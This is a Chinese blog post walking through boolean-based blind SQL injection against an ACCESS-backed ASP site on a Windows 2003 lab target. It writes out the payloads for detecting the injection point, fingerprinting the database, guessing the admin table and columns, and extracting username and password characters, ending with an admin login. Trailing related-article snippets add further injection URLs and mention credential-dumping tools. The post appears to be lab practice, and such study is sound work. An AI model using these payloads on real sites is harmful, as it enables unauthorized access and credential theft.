ACCESS盲注之获取网站的管理员账户密码

最新推荐文章于 2024-05-09 01:57:05 发布
最新推荐文章于 2024-05-09 01:57:05 发布
阅读量1.9k 收藏 1
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48170459/article/details/110680156
版权

我们将通过一个网站来熟悉ACCESS盲注
靶机:
win2003
我们先在网站的各个地方寻找注入点,发现在id的位置存在一个注入点
在这里插入图片描述
接着判断是字符型注入还是数值型注入,发现是数值型注入
1.字符型测试:id=2’ and ‘1’='1或id=2" and “1”="1
2.数值型测试:id=2 and 1=1
在这里插入图片描述
接着进行错误注入判断
id=2 and 1=0
在这里插入图片描述
判断是否为ACCESS数据库
id=2 and exists(select * from sysobjects)
id=2 and exists(select * from msysobjects)
在这里插入图片描述

sysobjects表不存在,msysobject表存在,但没有读取权限,可以判断为ACCESS数据库,因为union在这里不能使用,我们采取盲注的方法
猜测是否存在表admin
id=2 and exists(select * from admin)

admin表存在。我们找一下管理员登录界面,试一下/admin/或admin.asp
在这里插入图片描述
管理员界面为admin.asp,名称框和密码框的name值为username和password
在这里插入图片描述
猜测admin表应该存在username字段和password字段,在注入点验证一下
id=2 and exists(select username,password from admin)
在这里插入图片描述
username和password存在,用二分判断username字段的第一个值的长度,结果为5,
id=2 and (select top 1 len(username) from admin)=5
在这里插入图片描述
同样判断password字段的第一个值的长度,结果为10
id=2 and (select top 1 len(password) from admin)=10
在这里插入图片描述
接着判断username和password的各个字符
payload格式:
id=2 and (select top 1 asc(mid(username,字符位置,1)) from admin)=字符的ascii值
我们编写python脚本进行测试,代码如下:
在这里插入图片描述
结果为:
在这里插入图片描述
最后来到管理员界面登录
在这里插入图片描述
登录成功
在这里插入图片描述

weixin_48170459
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用sqlmap获取网址管理员账号密码
WINDY_PACE的博客
04-21 6501
sqlmap 靶场的攻击入利用。
SQL入之access
游魂的博客
12-06 1040
ACCESS: 一般用于没有回显位,无法直接回显数据库内容。 有两种语句方法: 第一种方法: http://192.168.1.1/news.asp?id=155 order by 1 回显数据库错误,既不可用回显入。 http://192.168.1.1/news.asp?id=155 and 1=1 返回正常 http://192.168.1.1/news.asp?id=155 and ...
sql入-asp+access案例
qq_53706360的博客
12-04 77
id=1142 order by 22返回结果正常。id=1142 order by 23返回结果失败。爆破出密码: a48e190fafc257d3。爆出了admin字段的第一个值:admin。实战中表和列要靠字典去猜。
【谨慎学习】手把手教你破解网站管理后台帐号密码_运营管理后台密码(1)
最新发布
2401_84862061的博客
05-09 897
在上面的讲解中,我们已经学会了如何去获得后台的相关登录界面信息,接下来我们开始对获得的登录界面进行攻击操作,在此为了方便演示我们将以爆破路由器的后台管理界面为例,在执行下面的操作时,因为要使用 burpsuite 工具,所以我们需要安装一个Kali系统(可以使用虚拟机安装),具体安装过程这里不论述,请读者自行下载安装。在上面的情况中,因为ID和密码都是正确的,所以我们很轻松的就获得了这些信息,那么如果管理员输入的账户ID 是正确的而密码是错误的,我们又应该怎么操作呢?
shop靶机实践sql获取后台管理员账号密码
过客璇璇的博客
03-15 3717
shop靶机获取后台管理员账号密码 找到入点。 入点:http://192.168.244.131:60785/shop/productshopxp.asp?id=485 首先分析一下为什么确定这是一个入点: 一、 正常页面如下: 二、 在URL后加’即http://192.168.244.131:60785/shop/productshopxp.asp?id=485...
获取网站管理员账户密码
热门推荐
Mike_Roger的博客
01-24 2万+
最近学长让用sqlmap获取一个网站管理员账户密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是攻破,总之就是入门嘛。   SQL入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。   首先sqlmap据说是一个开源的
四招齐出——直取管理员密码
得峰的专栏 [网络收藏]
05-12 5048
千辛万苦找到一台服务器(俗称“肉鸡”)并将它控制,定会想尽办法保持这段“姻缘”,于是乎,各种后门齐上阵。结果呢?鸡飞蛋打,毕竟人家的杀毒软件不是摆设。克隆或建一个管理员账户呢?这也
Access 数据库密码获取器.rar
04-03
Access 数据库密码获取器.rar
易语言Access数据库密码获取
08-15
Access数据库密码获取器 系统结构:易语言Access数据库密码获取器源码,Access数据库密码获取器 ======窗口程序集1 | | | |------ __启动窗口_创建完毕 | | | |------ _选择_被单击 | | | |------ _按钮1
Access数据库密码获取器.rar
04-03
Access数据库密码获取器.rar
获取网站管理员账号 php,【超详细入门教程】通过xss获取管理员明文账号密码...
weixin_29290259的博客
04-09 2583
0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登录信息外的co...
获取系统管理员密码和账号findpass
01-10
获取系统管理员密码和账号findpass
如何通过破解hash来获取管理员密码
12-28
如何通过破解hash来获取管理员密码. 高手勿进。
mimikatz抓取管理员密码常用工具
12-10
mimikatz抓取管理员密码常用工具,有x64 x32位对应系统上传运行抓取
ACCESS 数据库 默认密码是csi
10-29
密码是csi 我单位有一个信息管理系统 后台是ACCESS数据库 我手里也没有源程序 由于工作需要 我把整个程序的文件夹和MDB数据库文件都拷回家里的计算机上 但是运行程序的时候就提示“未发现数据源名称并且未指定默认驱动程序dberr” 我在控制面板里面ODBC里按数据库文件路径和dberr这个名字添加了ACCESS数据源 (用户数据源和系统数据源都添加了) 但是这个程序还是启动不起来 到底应该怎么配置 数据源 ?? 非常感谢各位高手的解答!!!!
Access数据库基于时间的实现[www.freebuf.com]
weixin_33831196的博客
08-30 331
Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程式之一。0×00概述众所周知,access数据库是不支持基于时间的方式,但是我们可以利用access的系统表MSysAccessObjects,通过多...
sql获取网站后台管理员账号与密码
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
Access数据库练习
Reset
08-13 1098
http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)>5 显示错误 http://192.168.75.128/common.asp?id=7 and(select top 1 ...
【谨慎学习】手把手教你破解网站管理后台帐号密码
Innocence_0的博客
01-26 5153
对于网站运行的个人站长而言,最担心的是应如何有效且安全的去管理自己的网站,否则自己辛辛苦苦经营的网站就会被不请自来的不速之客给攻破,轻则站点数据被窃取,重则整个网站都被攻陷,导致无法恢复。本文主要从管理后台这个方面来讲解其黑客攻击过程,并通过在虚拟环境中展开实例演示,各读者可以跟着本教程去做实验,通过实验加强对攻击过程的了解,如果你是一名菜鸟站长也可以针对性的去做一下防护方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值